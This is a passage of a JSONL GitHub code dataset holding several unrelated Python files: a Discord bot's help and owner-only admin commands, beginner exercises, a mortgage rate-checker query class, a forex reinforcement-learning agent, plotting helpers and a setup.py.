owner_ids=self.config['owners'],\n activity=Game(self.config['status']),\n help_command=None,\n intents=intents)\n\n def reload_utils(self):\n importlib.reload(utils)\n utils.reload()\n importlib.reload(vars)\n importlib.reload(db)\n self.utils = utils\n self.vars = vars\n self.db = db\n\n def all_cogs(self):\n return [file.replace('.py', '') for file in os.listdir(self.vars.COGS_DIR) if file.endswith('.py')]\n\n def loaded_cogs(self, lower=True):\n return [c.lower() if lower else c for c in self.cogs]\n\n async def load_cogs(self):\n to_load = self.all_cogs()\n if 'perms' in to_load:\n to_load.insert(0, to_load.pop(to_load.index('perms')))\n for cog in to_load:\n try:\n await self.load_extension(f'{self.vars.COGS_DIR_NAME}.{cog}')\n except Exception as e:\n self.vars.LOGGER.error(e)\n\n def _run(self):\n if (self.config):\n self.start_time = datetime.now()\n self.run(self.config['token'])\n\n async def on_ready(self):\n for c in DEFAULT_COMMANDS:\n self.add_command(c)\n await self.load_cogs()\n self.pm.load_prefixes()\n\n async def on_message(self, msg):\n process = True\n m = msg.content\n if m.startswith(self.pm.prefix):\n cmd = m.split(' ')[0].split(self.pm.prefix)[1]\n if not cmd in self.pm.cmd_prefixes['Base'] or cmd == 'help':\n process = False\n if msg.guild:\n channel = f'[{msg.guild.id}]'\n elif isinstance(msg.channel, DMChannel):\n channel = f'({msg.channel.recipient})'\n if not m.startswith(self.pm.prefix):\n process = False\n elif not msg.author.id in self.owner_ids:\n process = False\n else:\n channel = f'({msg.channel.name})'\n self.vars.LOGGER.info('{0} {1.author}: {1.content}'.format(channel, msg))\n if msg.author.bot:\n return\n if process:\n await self.process_commands(msg)\n\n async def on_command_error(self, ctx, error):\n if isinstance(error, commands.CommandNotFound):\n return\n elif isinstance(error, commands.NotOwner):\n return\n elif isinstance(error, commands.CheckAnyFailure) or isinstance(error, commands.CheckFailure):\n await ctx.send(error)\n elif isinstance(error, commands.TooManyArguments):\n await ctx.send('Too many argument(s).')\n elif isinstance(error, commands.BadArgument):\n await ctx.send('Invalid argument(s).')\n elif isinstance(error, commands.MissingRequiredArgument):\n return await ctx.send('Missing argument(s).')\n elif isinstance(error, commands.CommandInvokeError):\n o_error = error.original\n if isinstance(o_error, discord.errors.Forbidden):\n if ctx.cog.qualified_name == 'Roles':\n await ctx.send('I do not have enough permissions to add that role.')\n elif isinstance(error, discord.errors.HTTPException):\n if ctx.command.name == 'ev':\n await ctx.send('Output too big.')\n elif isinstance(error, sqlite3.Error):\n await ctx.send('There was a database error.')\n if ctx.cog:\n self.vars.LOGGER.error(f'({ctx.author}){ctx.cog.qualified_name}|{ctx.message.content}|{error}')\n # All other Errors not returned come here. And we can just print the default TraceBack.\n if len(self.tbs) >= 50:\n self.tbs = []\n self.tbs.insert(0, ''.join(traceback.format_exception(type(error), error, error.__traceback__)))\n print('Ignoring exception in command {}:'.format(ctx.command), file=sys.stderr)\n traceback.print_exception(type(error), error, error.__traceback__, file=sys.stderr)\n\n\n\"\"\"\nHELP COMMAND FUNCTIONS\n\"\"\"\n\n\n@commands.command(description='Look at help for cogs and commands',\n help='*args* can be a cog or command name, not case-sensitive')\nasync def help(ctx, *, args=None):\n if not args:\n return await send_bot_help(ctx)\n else:\n args = args.lower()\n for name, cog in ctx.bot.cogs.items():\n if name.lower() == args:\n return await send_cog_help(ctx, cog)\n for command in ctx.bot.commands:\n if args == command.name or (command.aliases and args in command.aliases):\n try:\n if command.commands:\n return await send_group_help(ctx, command)\n except:\n return await send_cmd_help(ctx, command)\n await ctx.send('Invalid cog or command.')\n\n\nasync def send_bot_help(ctx):\n e = Embed(title='Eschamali Help')\n e.description = '\\n'.join(sorted(ctx.bot.loaded_cogs(lower=False)))\n e.set_footer(text=f'{ctx.bot.pm.help_prefix}help ')\n e.colour = discord.Colour.purple()\n await ctx.send(embed=e)\n\n\nasync def send_cog_help(ctx, cog):\n e = Embed(title=f'[{_get_cog_prefix(ctx, cog)}]{cog.qualified_name} Help')\n e.description = (cog.description + '\\n' if cog.description else '') + \\\n '\\n'.join([f'**{c.name}** {c.brief if c.brief else \"\"}' for c in cog.get_commands()])\n e.set_footer(text=f'{ctx.bot.pm.help_prefix}help ')\n e.colour = discord.Colour.purple()\n await ctx.send(embed=e)\n\n\nasync def send_group_help(ctx, group):\n prefix = _get_cog_prefix(ctx, group.cog)\n e = Embed(title=f'{prefix}{group.name} subcommands')\n e.description = group.description\n for c in group.commands:\n e.add_field(name=f'{prefix}{group.name} {c.name}',\n value=c.description + ('\\nAliases: ' + ' '.join(c.aliases)) if c.aliases else '',\n inline=True)\n e.colour = discord.Colour.purple()\n await ctx.send(embed=e)\n\n\nasync def send_cmd_help(ctx, command):\n prefix = _get_cog_prefix(ctx, command.cog) if command.name != 'help' else ctx.bot.pm.help_prefix\n e = Embed(title=f'{prefix}{command.name} {command.signature}')\n e.add_field(name='Description',\n value=command.description,\n inline=True)\n e.add_field(name='Help',\n value=command.help,\n inline=False)\n if command.aliases:\n e.set_footer(text=f'Aliases: {\" \".join(command.aliases)}')\n e.colour = discord.Colour.purple()\n await ctx.send(embed=e)\n\n\ndef _get_cog_prefix(ctx, cog):\n if cog and cog.qualified_name in ctx.bot.pm.cog_prefixes:\n return ctx.bot.pm.cog_prefixes[cog.qualified_name]\n return ctx.bot.pm.prefix\n\n\n\"\"\"\nOWNER FUNCTIONS\n\"\"\"\n\n\n@commands.command(description='Shows how long the bot has been running',\n help='Owners only',\n brief='Show bot uptime')\n@commands.is_owner()\nasync def uptime(ctx):\n await ctx.send(str(datetime.now() - ctx.bot.start_time).split('.')[0])\n\n\n@commands.command(aliases=['guilds'],\n description='Shows servers the bot is in',\n help='Owners only',\n brief='Show bot servers')\n@commands.is_owner()\nasync def servers(ctx):\n guilds = sorted(ctx.bot.guilds, key=lambda g: g.id)\n output = f'Connected to `{len(guilds)}` guilds.\\n'\n output += '```xl\\n'\n output += '%s | %s | %s\\n%s | %s | %s\\n' % ('Server Name'.center(50),\n 'Server ID'.center(20),\n 'Users'.center(10),\n '-' * 50, '-' * 20, '-' * 10)\n for g in guilds:\n output += '%50s | %s | %s\\n' % (g.name, str(g.id).center(20), str(g.member_count).center(10))\n output += '```'\n await ctx.send(output)\n\n\n@commands.command(aliases=['cs'],\n description='Change bot status for this session',\n help='Owners only',\n brief='Change bot status')\n@commands.is_owner()\nasync def changestatus(ctx, *, msg):\n await ctx.bot.change_presence(activity=Game(msg))\n\n\n@commands.command(aliases=['cds'],\n description='Change default bot status for current and future sessions',\n help='Owners only',\n brief='Change default bot status')\n@commands.is_owner()\nasync def changedefaultstatus(ctx, *, msg):\n ctx.bot.config['status'] = msg\n await changestatus(ctx, msg=msg)\n with open(ctx.bot.vars.CONFIG_FILE, 'w') as f:\n json.dump(ctx.bot.config, f)\n await ctx.send('Changed default status to ' + msg)\n\n\n@commands.command(description='Shutdown the bot',\n help='Owners only',\n brief='Shutdown bot')\n@commands.is_owner()\nasync def shutdown(ctx):\n await ctx.send('Shutting down...')\n await ctx.bot.close()\n\n\n@commands.command(description='Update bot files with latest from github',\n help='Owners only',\n brief='Update from github')\n@commands.is_owner()\nasync def git(ctx):\n stream = os.popen('git pull origin master')\n output = stream.read()\n stream2 = os.popen('git log -1')\n output2 = stream2.read().split('\\n')\n output2 = '\\n'.join([o.strip() for o in output2 if not o.startswith('commit ') and not o.startswith('Author') and len(o) > 0])\n await ctx.send(f'```{output}\\n\\n{output2}```')\n if not output.startswith('Already up to date.'):\n to_reload = []\n for line in output.split('\\n'):\n if line.strip().startswith('cogs/'):\n cog = line.strip().split(' ')[0].split('/')[1].split('.')[0]\n to_reload.append(cog)\n if to_reload:\n await ctx.bot.cogs['General']._reload_all(ctx, to_reload)\n else:\n await ctx.send('No cogs to reload. Might require restart.')\n\n\n@commands.command(aliases=['t', 'T', 'q', 'Q'],\n description='Run test.py',\n help='Owners only',\n brief='Test')\n@commands.is_owner()\nasync def test(ctx, timeout=300):\n async def test_run():\n try:\n coro = asyncio.create_subprocess_shell('python3 test.py', stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE)\n proc = await asyncio.wait_for(coro, timeout)\n stdout, stderr = await proc.communicate()\n\n if stdout:\n await ctx.send(f'```{stdout.decode()}```')\n if stderr:\n await ctx.send(f'```{stderr.decode()}```')\n except asyncio.exceptions.TimeoutError as e:\n await ctx.send(f'```Timed out.```')\n await ctx.send('```Running test.py```')\n await test_run()\n\nDEFAULT_COMMANDS = [uptime, servers, changestatus, changedefaultstatus, shutdown, git, help, test]\nEschamali()._run()\n","repo_name":"Barkuto/eschamali","sub_path":"eschamali.py","file_name":"eschamali.py","file_ext":"py","file_size_in_byte":11909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"36111246806","text":"# Crie um programa que leia duas notas de um aluno e calcule a sua média, mostrando uma mensagem mo final, de acordo\n# com a média atingida:\n# - Média abaixo de 5.0: REPROVADO\n# - Média entre 5.0 e 6.9: RECUPERAÇÃO\n# - Média 7.0 ou superios: APROVADO\n\nnota1 = float(input(\"Informe a \\033[1mprimeira nota\\033[m: \"))\nnota2 = float(input(\"Informe a \\033[1msegunda nota\\033[m: \"))\n\nmedia = (nota1 + nota2) / 2\n\nprint(\"Com as notas \\033[1;32m{}\\033[m e \\033[1;32m{}\\033[m, sua média é de \\033[1;32m{}.\"\n .format(nota1, nota2, media))\n\nif media < 5.0:\n print(\"\\033[1;31mSITUAÇÃO: REPROVADO\")\nelif 5.0 >= media > 7:\n print(\"\\033[1;33mSITUAÇÃO: RECPUERAÇÃO\")\nelse:\n print(\"\\033[1;34mSITUAÇÃO: APROVADO\")\n","repo_name":"SuxPorT/python-exercises","sub_path":"Mundo 2 - Estruturas de Controle/Desafio #040.py","file_name":"Desafio #040.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4780639336","text":"import sys\ninput = sys.stdin.readline\n\narray = []\nisbreak = False\nfor _ in range(9):\n array.append(int(input()))\n\narray.sort()\ngoal = sum(array) - 100\n\nfor i in range(len(array)-1,-1,-1):\n for j in range(len(array)-1):\n if array[i] + array[j] == goal:\n del array[i],array[j]\n isbreak = True\n break\n if isbreak:\n break\n \nfor num in array:\n print(num)","repo_name":"jeilbitna/project","sub_path":"baekjoon/baekjoon2309.py","file_name":"baekjoon2309.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40379709369","text":"import os,sys\r\nfrom src.exception import CustomException\r\nfrom src.logger import logging\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom dataclasses import dataclass\r\nfrom src.utils import load_object\r\n\r\nclass PredictionPipeline:\r\n def __init__(self) :\r\n pass\r\n\r\n\r\n def predict(self,feature):\r\n preprocessor_path=os.path.join(\"artifacts/Data_Transformation\",\"preprocessor.pkl\")\r\n model_path=os.path.join(\"artifacts/model_trainer\",\"model.pkl\")\r\n\r\n process=load_object(preprocessor_path)\r\n model=load_object(model_path)\r\n\r\n scaled= process.transform(feature)\r\n pred=model.predict(scaled)\r\n\r\n return pred\r\n\r\n\r\nclass CustomClass:\r\n def __init__(self,\r\n Gender:int,\r\n Married:int,\r\n Dependents:int,\r\n Education:int,\r\n Self_Employed:int,\r\n ApplicantIncome:int,\r\n CoapplicantIncome:int,\r\n LoanAmount:int,\r\n Loan_Amount_Term:int,\r\n Credit_History:int,\r\n Property_Area:int) :\r\n self.Gender=Gender,\r\n self.Married=Married,\r\n self.Dependents=Dependents,\r\n self.Education=Education,\r\n self.Self_Employed=Self_Employed,\r\n self.ApplicantIncome=ApplicantIncome,\r\n self.CoapplicantIncome=CoapplicantIncome,\r\n self.LoanAmount=LoanAmount,\r\n self.Loan_Amount_Term=Loan_Amount_Term,\r\n self.Credit_History=Credit_History,\r\n self.Property_Area=Property_Area\r\n\r\n\r\n\r\n def DataFrame(self):\r\n try:\r\n custom_input={\r\n \"Gender\":[self.Gender],\r\n \"Married\":[self.Married],\r\n \"Dependents\":[self.Dependents],\r\n \"Education\":[self.Education],\r\n \"Self_Employed\":[self.Self_Employed],\r\n \"ApplicantIncome\":[self.ApplicantIncome],\r\n \"CoapplicantIncome\":[self.CoapplicantIncome],\r\n \"LoanAmount\":[self.LoanAmount],\r\n \"Loan_Amount_Term\":[self.Loan_Amount_Term],\r\n \"Credit_History\":[self.Credit_History],\r\n \"Property_Area\":[self.Property_Area]\r\n\r\n }\r\n\r\n data=pd.DataFrame(custom_input)\r\n\r\n return data\r\n except Exception as e:\r\n raise CustomException(e,sys)\r\n ","repo_name":"NikhilPaulzagde/Data-Science-End-to-End-Project","sub_path":"Loan Approval Predictor/src/pipeline/prediction_pipeline.py","file_name":"prediction_pipeline.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"4056397120","text":"import oursql\n\nfrom utils import (\n parse_args, execute_query, parse_str, parse_arm,\n parse_state_abbr)\n\nPARAMETERS = {\n 'loan_type': [\n parse_str,\n 'There was an error processing value |%s| for loan_type parameter',\n 'CONF',\n ],\n 'rate_structure': [\n parse_str,\n 'There was an error processing value |%s| for rate_structure parameter',\n 'Fixed',\n ],\n 'arm_type': [\n parse_arm,\n 'The value |%s| does not look like an ARM type parameter',\n '5/1',\n ],\n 'loan_term': [\n int,\n 'Loan term must be a numeric value, |%s| provided',\n 30,\n ],\n 'price': [\n float,\n 'House price must be a numeric value, |%s| provided',\n 200000,\n ],\n 'loan_amount': [\n float,\n 'Loan amount must be a numeric value, |%s| provided',\n 180000,\n ],\n 'state': [\n parse_state_abbr,\n 'State must be a state abbreviation, |%s| provided',\n 'DC',\n ],\n 'fico': [\n int,\n 'FICO must be a numeric, |%s| provided',\n 720\n ],\n 'minfico': [\n int,\n 'MinFICO must be an integer, |%s| provided',\n 700\n ],\n 'maxfico': [\n int,\n 'MaxFICO must be an integer, |%s| provided',\n 719\n ],\n 'points': [\n float,\n 'Points value must be a numeric, |%s| provided',\n 0\n ],\n 'lock': [\n int,\n 'Lock value must be an integer, |%s| provided',\n 60\n ],\n #'property_type': [\n # parse_str,\n # 'There was an error processing |%s| for property type',\n # 'CONDO',\n #]\n}\n\n\nclass RateChecker(object):\n \"\"\" This is the class that powers the rate checker. It embodies\n all the business and querying logic for the rate checker. \"\"\"\n\n def __init__(self):\n \"\"\"Set parameters to default values.\"\"\"\n self.errors = []\n self.data = []\n self.status = \"OK\"\n self.request = {}\n\n def process_request(self, request):\n \"\"\"The main function which processes request and returns result\n back.\"\"\"\n\n results = parse_args(request, PARAMETERS)\n self.request = results['results']\n if len(results['errors']) > 0:\n self.errors = results['errors']\n self.status = 'Error'\n self._defaults()\n self._data()\n return self._output()\n\n def _output(self):\n \"\"\"Compile response\"\"\"\n return {\n \"status\": self.status,\n \"request\": self.request,\n \"data\": self.data,\n \"errors\": self.errors,\n }\n\n def _data(self):\n \"\"\"Calculate results.\"\"\"\n data = []\n\n ltv = float(self.request['loan_amount']) / self.request['price'] * 100\n minltv = maxltv = ltv\n\n # lock times\n locks = {\n 30: [0, 30],\n 45: [31, 45],\n 60: [46, 60],\n }\n minlock = maxlock = self.request['lock']\n if self.request['lock'] in locks:\n minlock = locks[self.request['lock']][0]\n maxlock = locks[self.request['lock']][1]\n\n qry_args = [\n self.request['loan_amount'], self.request['loan_amount'],\n self.request['minfico'], self.request['maxfico'], minltv, maxltv,\n self.request['state'], self.request['loan_amount'],\n self.request['loan_amount'], self.request['minfico'],\n self.request['maxfico'], minltv, maxltv, self.request['state'],\n minltv, maxltv, self.request['minfico'], self.request['maxfico'],\n self.request['loan_amount'], self.request['loan_amount'],\n self.request['state'], self.request['rate_structure'].upper(),\n self.request['loan_term'], self.request['loan_type'].upper(),\n minlock, maxlock]\n\n query = \"\"\"\n SELECT\n r.Institution AS r_institution,\n r.Lock AS r_lock,\n r.BaseRate AS r_baserate,\n r.TotalPoints AS r_totalpoints,\n r.Planid AS r_planid,\n COALESCE(adjr.adjvalueR,0) AS adjvaluer,\n COALESCE(adjp.adjvalueP,0) AS adjvaluep\n FROM\n oah_rates r\n INNER JOIN oah_limits l ON r.planid = l.planid\n LEFT OUTER JOIN (\n SELECT\n planid,\n sum(adjvalue) adjvalueR\n FROM oah_adjustments\n WHERE 1=1\n AND (\n (MINLOANAMT <= ? AND MAXLOANAMT >= ? AND MINLOANAMT <> 0 AND MAXLOANAMT <> 999999999)\n OR (MINFICO <= ? AND MAXFICO >= ? AND (MINFICO > 0 OR (MINFICO <> 0 AND MAXFICO <> 999)) AND MINLTV <= ? AND MAXLTV >= ?)\n OR (STATE=?)\n )\n AND AffectRateType='R'\n GROUP BY planid\n ) adjr ON adjr.PlanID = r.planid\n LEFT OUTER JOIN (\n SELECT\n planid,\n sum(adjvalue) adjvalueP\n FROM oah_adjustments\n WHERE 1=1\n AND (\n (MINLOANAMT <= ? AND MAXLOANAMT >= ? AND MINLOANAMT <> 0 AND MAXLOANAMT <> 999999999)\n OR (MINFICO <= ? AND MAXFICO >= ? AND (MINFICO > 0 OR (MINFICO <> 0 AND MAXFICO <> 999)) AND MINLTV <= ? AND MAXLTV >= ?)\n OR (STATE=?)\n )\n\n AND AffectRateType='P'\n GROUP BY planid\n ) adjp ON adjp.PlanID = r.planid\n\n WHERE 1=1\n -- Limits stuff\n AND (l.minltv <= ? AND l.maxltv >= ?)\n AND (l.minfico <= ? AND l.maxfico >= ?)\n AND (l.minloanamt <= ? AND l.maxloanamt >= ?)\n AND (r.stateid=?)\n AND r.loanpurpose='PURCH'\n AND r.pmttype = ?\n AND r.loanterm = ?\n AND r.loantype = ?\n AND r.lock BETWEEN ? AND ?\n %s\n ORDER BY r_Institution, r_BaseRate\n \"\"\"\n\n additional_query = \"\"\n if self.request['rate_structure'].upper() == 'ARM':\n additional_query = \"AND r.io = 0 AND r.intadjterm = ? \"\n qry_args.append(\n self.request['arm_type'][:self.request['arm_type'].index('/')])\n\n rows = execute_query(\n query % additional_query, qry_args, oursql.DictCursor)\n\n self.data = self._calculate_results(rows)\n\n def bucket_results(self, result):\n \"\"\" This API allows users to draw a histogram at the end, so we bucket\n the results here. \"\"\"\n\n buckets = {}\n for row in result:\n if result[row]['final_rates'] in buckets:\n buckets[result[row]['final_rates']] += 1\n else:\n buckets[result[row]['final_rates']] = 1\n return buckets\n\n def closer_to_zero(self, original_final_points, new_final_points):\n \"\"\" For each plan, we pick the results with the final points that are\n closest to zero. \"\"\"\n\n if abs(new_final_points) < abs(original_final_points):\n return True\n elif abs(new_final_points) == abs(original_final_points):\n return new_final_points > 0 and original_final_points < 0\n return False\n\n def _calculate_results(self, data):\n \"\"\" Further apply filters to the results, based on calculations made\n during the SQL query. \"\"\"\n\n maxpoints = self.request['points'] + 0.5\n minpoints = self.request['points'] - 0.5\n\n filtered_on_points = []\n\n for row in data:\n row['final_points'] = row['adjvaluep'] + row['r_totalpoints']\n final_points = row['final_points']\n if final_points <= maxpoints and final_points >= minpoints:\n row['final_rates'] = \"%.3f\" % (\n row['adjvaluer'] + row['r_baserate'])\n filtered_on_points.append(row)\n\n result = {}\n for row in filtered_on_points:\n #TODO: can be combined\n if row['r_planid'] not in result:\n result[row['r_planid']] = row\n elif self.closer_to_zero(\n result[row['r_planid']]['final_points'], row['final_points']):\n result[row['r_planid']] = row\n\n return self.bucket_results(result)\n\n def _defaults(self):\n \"\"\"Set defaults, calculate intermediate values for args.\"\"\"\n self._set_ficos()\n self._set_loan_amount()\n tmp = dict((k, v[2]) for k, v in PARAMETERS.iteritems())\n tmp.update(self.request)\n self.request = tmp\n if self.request['rate_structure'].lower() == 'fixed':\n del self.request['arm_type']\n if 'fico' in self.request:\n del self.request['fico']\n\n def _set_loan_amount(self):\n \"\"\" Set loan_amount and price values. If one is not provided, determine\n using the other. \"\"\"\n\n req = self.request\n amount = 'loan_amount'\n\n if amount in req and 'price' not in req:\n req['price'] = int(req[amount] * 1.1)\n elif amount not in req and 'price' in req:\n req[amount] = int(req['price'] * 0.9)\n elif amount in req and 'price' in req and req[amount] > req['price']:\n req[amount], req['price'] = req['price'], req[amount]\n\n def _set_ficos(self):\n \"\"\" Set the min and max FICO scores \"\"\"\n req = self.request\n\n if 'minfico' not in req and 'maxfico' not in req and 'fico' in req:\n req['minfico'] = req['fico']\n req['maxfico'] = req['fico']\n\n # Only one of them is set\n elif 'minfico' in req and 'maxfico' not in req:\n req['maxfico'] = req['minfico']\n elif 'minfico' not in req and 'maxfico' in req:\n req['minfico'] = req['maxfico']\n elif ('minfico' in req and 'maxfico' in req and\n req['minfico'] > req['maxfico']):\n req['minfico'], req['maxfico'] = req['maxfico'], req['minfico']\n\n # so that results for minfico=700,maxfico=720 and\n # minfico=720,maxfico=740 don't overlap\n\n if ('maxfico' in req and 'minfico' in req and\n req['maxfico'] != req['minfico']):\n self.request['maxfico'] -= 1\n","repo_name":"fna/oah-backend","sub_path":"app/rate_checker.py","file_name":"rate_checker.py","file_ext":"py","file_size_in_byte":10477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5139200279","text":"import numpy as np\n\nfrom agent.Agent import Agent\nfrom data.data_manager import get_data_chunk\nfrom environment.EnvPlayer import PlayGround\nfrom environment.Environment import TradeEnvironment\nfrom preprocess.data_pre_process import create_data_frame\n\nimport tensorflow as tf\nimport os\n\ndirname = os.path.dirname(__file__)\nbase_path = dirname + \"/model_saved\"\nmodel_path = \"{}/model\".format(base_path)\n\nbase_path = dirname + \"/logs\"\nlog_path = \"{}\".format(base_path)\n\nprint(\"Model path => {}\".format(model_path))\nprint(\"Log path => {}\".format(log_path))\n\nobs_length = 21\naction_size = 3\n\n# Observations Count\nobservations = tf.placeholder(shape=[1, obs_length], dtype=tf.float32)\n# 0,1,2 BUY, STAY, SELL\nactions = tf.placeholder(shape=[None], dtype=tf.int32)\n# +1, -1 with discount\nrewards = tf.placeholder(shape=[None], dtype=tf.float32)\n\n# model\nY = tf.layers.dense(observations, 200, activation=tf.nn.relu)\nY = tf.layers.dense(Y, 100, activation=tf.nn.relu)\nY = tf.layers.dense(Y, 50, activation=tf.nn.relu)\nYlogits = tf.layers.dense(Y, action_size)\n\n# Sample an action from predicted probabilities\nsample_op = tf.multinomial(logits=tf.reshape(Ylogits, shape=(1, 3)), num_samples=1)\n\n# loss\ncross_entropies = tf.losses.softmax_cross_entropy(onehot_labels=tf.one_hot(actions, action_size),\n logits=Ylogits)\n\nloss = tf.reduce_sum(rewards * cross_entropies)\n\n# Training Operation\noptimizer = tf.train.RMSPropOptimizer(learning_rate=0.001, decay=0.99)\ntrain_op = optimizer.minimize(loss)\n\ninit_op = tf.initialize_all_variables()\n\nsaver = tf.train.Saver()\n\n\ndef dif_to_action(diff):\n if diff < 0:\n return 0 # Sell\n elif diff == 0:\n return 1 # Stay\n else:\n return 2 # Buy\n\n\nclass FxEnv(TradeEnvironment):\n\n @classmethod\n def __reward__(self, state, action, state_t):\n if state_t is not None and state is not None:\n diff = state_t[:1] - state[:1]\n actual_action = dif_to_action(diff)\n if actual_action - action == 0:\n return 1\n else:\n return -1\n return 0\n\n\nclass FxTradeAgent(Agent):\n epsilon = 0.5\n epsilon_decay = 0.995\n train_agent = True\n\n @classmethod\n def after_init(self):\n self.sess = tf.Session()\n\n saver.restore(self.sess, model_path)\n # self.sess.run(init_op)\n file_writer = tf.summary.FileWriter(log_path, self.sess.graph)\n\n def get_policy_decision(self, state):\n if state is not None:\n state = np.reshape(state, (1, obs_length))\n return self.sess.run(sample_op, feed_dict={observations: state})\n return np.argmax(np.random.randint(1, 3, self.action_size))\n\n def act(self, state):\n # Act with epslion on traning process\n if self.train_agent is False:\n return self.get_policy_decision(state)\n else:\n if np.random.rand() >= self.epsilon:\n return self.get_policy_decision(state)\n else:\n return np.argmax(np.random.randint(1, 3, self.action_size))\n\n def after_memories(self, train_status):\n if train_status:\n self.epsilon = self.epsilon * self.epsilon_decay\n\n def replay(self, memories):\n\n for state_t_pre, action_t_pre, reward_t_pre, state_t, done in memories:\n # if action_t_pre !=0:\n # print(action_t_pre)\n\n action_t_pre = np.array(action_t_pre)\n reward_t_pre = np.array(reward_t_pre)\n state_t_pre = np.array(state_t_pre)\n # Reshape Inputs\n action_t_pre = np.reshape(action_t_pre, (1,))\n reward_t_pre = np.reshape(reward_t_pre, (1,))\n state_t_pre = np.reshape(state_t_pre, (1, state_t_pre.shape[0]))\n\n # print(state_t_pre, action_t_pre, reward_t_pre, state_t)\n\n feed_dict = {\n rewards: reward_t_pre,\n observations: state_t_pre,\n actions: action_t_pre\n }\n self.sess.run(train_op, feed_dict=feed_dict)\n\n saver.save(self.sess, save_path=model_path)\n\n with tf.name_scope('cross_entropy'):\n tf.summary.scalar('cross_entropy', cross_entropies)\n\n with tf.name_scope('accuracy'):\n with tf.name_scope('correct_prediction'):\n correct_prediction = tf.equal(tf.argmax(Y, 1), tf.argmax(Ylogits, 1))\n with tf.name_scope('accuracy'):\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n tf.summary.scalar('accuracy', accuracy)\n merged = tf.summary.merge_all()\n\n # file_writer = tf.summary.FileWriter(log_path, self.sess.graph)\n file_writer = tf.summary.FileWriter(log_path)\n\n\npair_name = \"EURUSD\"\ninterval = 1\n\nfuture_state = 4\nstate_size = 47\naction_size = 3\nconsidering_steps = 15\n\nrsi_range = [14]\ntsi_range = [14, 29, 58, 100]\nemi_range = [3, 89]\naroon_range = [3, 21, 89]\ndpo_range = [3, 21, 89]\n\nchunk_size = 2e4\n\nfx_agent = FxTradeAgent(max_length=20000)\n\ndata_frames = get_data_chunk(pair_name, interval,\n chunk_size=chunk_size)\n\nplayground_step = 0\n\nfor data_frame in data_frames:\n print(\"\\n----Start Processing Another Chunk of Data ----\")\n print(data_frame.head(1))\n print(data_frame.tail(1))\n print(\"----\")\n df = create_data_frame(data_frame,\n considering_steps=considering_steps,\n rsi_range=rsi_range,\n tsi_range=tsi_range,\n emi_range=emi_range,\n aroon_range=aroon_range,\n dpo_range=dpo_range)\n print(\"---Data Summary---\")\n print(df.head())\n print(df.tail())\n print(f\"Before Process {len(data_frame)}\")\n print(f\"After Process {len(df)}\")\n print(\"\\n\")\n fx_env = FxEnv(df.values)\n\n # print(state)\n pl = PlayGround(env=fx_env,\n agent=fx_agent,\n time_frame=1,\n playground_step=playground_step)\n pl.play()\n playground_step += 1\n","repo_name":"ceylon-ai-projects/data_stream_gym","sub_path":"trading_agent.py","file_name":"trading_agent.py","file_ext":"py","file_size_in_byte":6117,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"40"} +{"seq_id":"36572918209","text":"import sys\nimport os\n\nfrom setuptools import setup, find_packages\n\n# import version\n\nimport numpy\n\ninclude_dirs = [numpy.get_include()]\n\nsys.path.append(os.path.join(os.path.dirname(__file__), \"src\"))\n\npacks = find_packages(\"src\", include=[\"amulet*\"])\n\nprint(packs)\n\nsetup(\n name=\"amulet\",\n version=\"0.0.0\",\n packages=packs,\n package_dir={\"\": \"src\"},\n include_dirs=include_dirs,\n include_package_data=True,\n)\n","repo_name":"Amulet-Team/Amulet-cli","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"69841067322","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\n\n\ndef plot_matrix(matrix, classes, x_label, y_label, save_to, ticks_rotation=45, show=False):\n fig, ax = plt.subplots(1, 1)\n sns.heatmap(matrix, annot=True, cmap='crest', fmt='d')\n classes_indexes = classes.argsort()\n classes_labels = classes.tolist()\n ax.set_xticks(classes_indexes + 0.5)\n ax.set_yticks(classes_indexes + 0.5)\n ax.set_xticklabels(classes_labels, rotation=ticks_rotation, ha='left', rotation_mode='anchor')\n ax.set_yticklabels(classes_labels, rotation=ticks_rotation, ha='left', rotation_mode='anchor')\n ax.set_xlabel(x_label)\n ax.set_ylabel(y_label)\n plt.tight_layout()\n plt.savefig(save_to, bbox_inches='tight', pad_inches=0.5, dpi=600)\n if show:\n plt.show()\n\n\ndef plot_roc(fpr, tpr, save_to, ticks_rotation=45, show=False):\n fig, ax = plt.subplots(1, 1)\n ax.set_title('Receiver Operating Characteristic')\n ax.plot(fpr, tpr, label='AUC = %.2f')\n ax.set_xlabel('False Positive Rate')\n ax.set_ylabel('True Positive Rate')\n plt.tight_layout()\n plt.savefig(save_to, bbox_inches='tight', pad_inches=0.5, dpi=600)\n if show:\n plt.show()\n","repo_name":"sudrizzz/vbr","sub_path":"src/utils/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19667322687","text":"import sys\r\nimport copy\r\ninput = sys.stdin.readline\r\nA, B, C, D, E, F, X = map(int, input().split())\r\none_X = copy.deepcopy(X)\r\ntwo_X = copy.deepcopy(X)\r\nans_A = 0\r\nans_B = 0\r\nwhile one_X > 0:\r\n if one_X - A >= 0:\r\n one_X -= (A + C)\r\n ans_A += (B * A)\r\n elif one_X < 0:\r\n break\r\n else:\r\n ans_A += (B * one_X)\r\n break\r\n\r\nwhile two_X > 0:\r\n if two_X - A >= 0:\r\n two_X -= (D + F)\r\n ans_B += (E * D)\r\n elif two_X < 0:\r\n break\r\n else:\r\n ans_B += (E * two_X)\r\n break\r\nans = str()\r\nif ans_A > ans_B:\r\n ans = 'Takahashi'\r\nelif ans_A < ans_B:\r\n ans = 